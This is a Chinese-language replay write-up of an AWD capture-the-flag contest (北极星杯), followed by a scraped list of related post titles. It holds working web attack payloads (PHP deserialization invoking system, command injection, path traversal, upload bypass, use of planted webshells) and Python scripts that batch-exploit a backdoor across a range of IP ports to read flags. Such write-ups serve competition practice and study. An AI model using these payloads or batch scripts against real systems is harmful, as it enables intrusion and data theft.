北极星杯 awd复现

服务器共有3个web和一个pwn

web1

1,down下web1的源码,使用D盾扫描:

2,漏洞1:发现三个冰蝎的木马,和一个一句话木马

冰蝎的后门需要使用冰蝎的客户端进行连接:如图:

一句话木马直接使用菜刀或蚁剑连接即可:

3,漏洞2:sqlhelper.php的反序列化漏洞:

构造payload:

class A{

public $name;

public $male;

function __destruct(){

$a = $this->name;

$a($this->male);

}

}

$s = new A;

$a = serialize($s);

echo $a;

构造payload得:

O:1:"A":2:{s:4:"name";s:6:"system";s:4:"male";s:9:"cat /flag";};

最终payload:

GET: ?x=v01cano

POST: un=O:1:"A":2:{s:4:"name";s:6:"system";s:4:"male";s:9:"cat /flag";};

4,漏洞3:sql注入漏洞login/index.php

username没有任何过滤,直接带入查询语句进行查询,由此处产生了sql注入漏洞。

5,漏洞4: 文件上传漏洞info.php

此处仅仅判断了content-type,所以只需在bp中修改content-type即可成功绕过。

web2

1,down下源码D盾扫描,发现如下漏洞:

icon/pww.php 冰蝎后门

images/pass.php 冰蝎后门

login/index.php 中有一句话木马:

2,connect.php的命令执行漏洞

仅仅使用addslashes对$host参数进行了过滤,我们执行命令的时候不使用引号和反斜杠\即可

payload:

||cat /flag > /ver/www/html/1.txt

3,img.php任意文件读取漏洞

使用seay源代码审计系统进行自动审计,发现该漏洞:

img参数没有任何过滤,直接带入file_get_contents函数进行文件读取,从而造成了文件读取漏洞。

payload:

/img.php?img=../../../../../../../flag

4,sqlhelper.php的反序列化漏洞

构造payload:

class A{

public $name;

public $male;

function __destruct(){

$a = $this->name;

$a($this->male);

}

}

$s = new A;

$a = serialize($s);

echo $a;

构造payload得:

O:1:"A":2:{s:4:"name";s:6:"system";s:4:"male";s:9:"cat /flag";};

最终payload:

POST: un=O:1:"A":2:{s:4:"name";s:6:"system";s:4:"male";s:9:"cat /flag";};

web3

1,down下源码D盾扫描,发现如下漏洞:

命令执行漏洞:export.php

payload:

|| cat /flag > /var/www/html/1.txt ||

总结:

在awd比赛过程中,脚本的力量是不可忽略的,批量操作可以快速占据高地。

1,开局getflag脚本:

开局利用预留后门getflag,此处目标主机均是端口不同,修改端口即可。

import requests

url = "http://182.254.171.241:88{0}"

shell = "/.a.php"

payload = {"c": "system('cat /flag');"}

# data = {"c": "system('cat /flag');"}

for i in range(1, 5, 1):

i = str(i).zfill(2)

url1 = url.format(i) + shell

# print(url1)

try:

res = requests.post(url1, data=payload)

# print(res.status_code)

if res.status_code == requests.codes.ok:

res.encoding = res.apparent_encoding

print(url1+"connect success ,flag is : "+res.text)

else:

print("shell 404")

except:

print(url1 + "connect shell fail")

其他表哥们的脚本:

import requests

u = open('ip.txt', 'r+')

for urls in u:

try:

if 'http://' not in urls:

urle = 'http://' + urls

urlss = urle.strip('\n') + '/.a.php'

data = {"c": "system('cat /flag');"}

req = requests.post(url=urlss, data=data, timeout=3)

if req.status_code == 200:

print(req.text)

except:

print()

ip.txt中内容如下;

ip.txt可以采用如下脚本按照需要生成即可:

ip = "182.254.171.241:88{0}"

for i in range(1, 5, 1):

i = str(i).zfill(2)

ip1 = ip.format(i)

with open("ip1.txt","a") as f:

f.write(ip1+"\n")

以get请求获取flag:

import requests

ip = open("ip.txt", "r")

payload = {"c": "system('cat /flag');"}

shell = '/.a.php'

for url in ip:

if 'http://' not in url:

url = 'http://' + url

webshell = url + shell

try:

res = requests.get(webshell, params=payload, timeout=1)

if res.status_code == 200:

print(res.text)

else:

print("shell error")

except:

print("未知错误")

reference:

awd的批量脚本 pwn_北极星杯 awd复现相关推荐

  1. awd的批量脚本 pwn_北极星杯AWD-Writeup

    前言 祝祖国70周年生日快乐,也祝星盟一周年生日快乐.感谢各位师傅在国庆假期抽出时间参加这次比赛,也感谢负责组织比赛的师傅忙前忙后. 我是M09ic,负责本次北极星杯AWD的赛后分享.靠着抱大腿以及足 ...

  2. awd的批量脚本 pwn_[原创]第一届护网杯线下决赛awd之shell多解

    前言 好久不打比赛,顺便来北京实习就参加了护网杯.排名虽然有所提高但还是被各种大表哥吊打.(和企业参赛简直痛苦)这里带来决赛中awd比赛pwn题shell的两种漏洞利用方式. 程序保护 保护全开 程序 ...

  3. awd的批量脚本 pwn_AWD攻防之web入门篇

    前言 AWD(Attack With Defense,攻防兼备)模式是一个非常有意思的模式,你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分.也就是说,攻击别人的靶机可以获取 Flag ...

  4. awd的批量脚本 pwn_CTF线下赛AWD套路小结

    CTF线下赛AWD套路小结 本文已在先知社区发表,欢迎访问,链接h 最近打了2场CTF线下赛,把AWD模式中的一些小套路做一些总结,本人web狗,二进制部分就不班门弄斧了. 一.AWD模式简介 AWD ...

  5. plsql command window 执行批量脚本

    commandwindow 是执行批量脚本的,也可以单个执行一条语句,但它的输出结果不如sqlwindow,而sqlwindow执行的是一个语句,输出结果是规范的表格 比如,现在有100条插入语句,你 ...

  6. 通过批处理调用SQL*Plus执行批量脚本

    文章目录 在批处理文件中调用SQL*Plus命令执行批量脚本的场景 Windows命令终端连接数据库 方式1:登录进入SQL命令行 方式2:先进入SQL命令行,再登录 方式3: 使用用户名/密码连接指 ...

  7. 【图像去噪】兴智杯论文复现赛——NAFNet

    论文复现--Low-level算法 NAFNet (去噪) Simple Baselines for Image Restoration--一个简单的用于图像恢复的强基线模型 官方源码:https:/ ...

  8. 2018领航杯awd简单复现

    首先这里需要搭建一个cms的平台得到: 利用D盾进行漏洞扫描得到: 5级的eval后门漏洞 可以看到这里有一个5级的eval后门漏洞,我们查看文件得到源码: 这是一句话后门,我们利用一下这个后门得到: ...

  9. HBase shell执行批量脚本

    场景描述: HBase namespace中有大量无用的小表,占用了过多的block,需要批量删除,了解了一下有两种方式: 1.使用通配符 用drop命令可以删除表.在删除一个表之前必须先将其禁用. ...

最新文章

  1. 2022-2028年中国电熔镁行业市场研究及发展趋势分析报告
  2. Linux基础知识之挂载详解(mount,umount及开机自动挂载)
  3. boost::hawick_circuits用法的测试程序
  4. java学习(102):arraylist的查询和删除
  5. WPF TreeView 绑定(demo 转)
  6. python中面向对象的缺点_面向对象中的多态在 Python 中是否没有什么意义?
  7. 嵌入式基础面八股文——孤儿进程、僵尸进程、守护进程的概念(3)
  8. 如何简单运行Java程序
  9. 标准的Java编码规范手册
  10. 如何在古董级IPAD上修改植物大战僵尸游戏金币
  11. ardl模型stata命令_计量经济学《手把手教你EViews软件操作教程与案例分析》
  12. 芯片数据分析步骤5 过滤探针
  13. 【实习日报】2019年4月下半月 前端开发实习工作日报汇总
  14. python对接支付宝支付_python对接支付宝PC端支付
  15. CentOS7安装IT资产管理系统Snipe-IT
  16. 大神的傅里叶变换,一定要看看
  17. 游戏建模3Dmax基础:游戏建模渲染小技巧
  18. 在线办公的前浪与后浪:输出工具到输出能力
  19. 腾讯云网站备案-网站访问类问题汇总及解答
  20. 网络基础 - 探秘无线速度(一)

热门文章

  1. 杂记-Macbook Pro M1芯片能玩深度学习吗?
  2. Hadoop的数据压缩
  3. asp.net+js+ajax实现手机移动端页面预览、剪裁、上传头像图片
  4. 微软声学回声消除demo AECMicArray的使用
  5. 剑指Offer——求1+2+3+...+n
  6. 「Jenkins Pipeline」- expected to call xxx but wound up catching xxx @20210219
  7. java对焦_Android camera摄像头对焦,zoom的通知事件回调,告诉java应用层已经对焦完成...
  8. C++string字符串初始化与使用
  9. Mac IntelliJ IDEA 2020.1 闪退
  10. 再论关于如何学习网络编程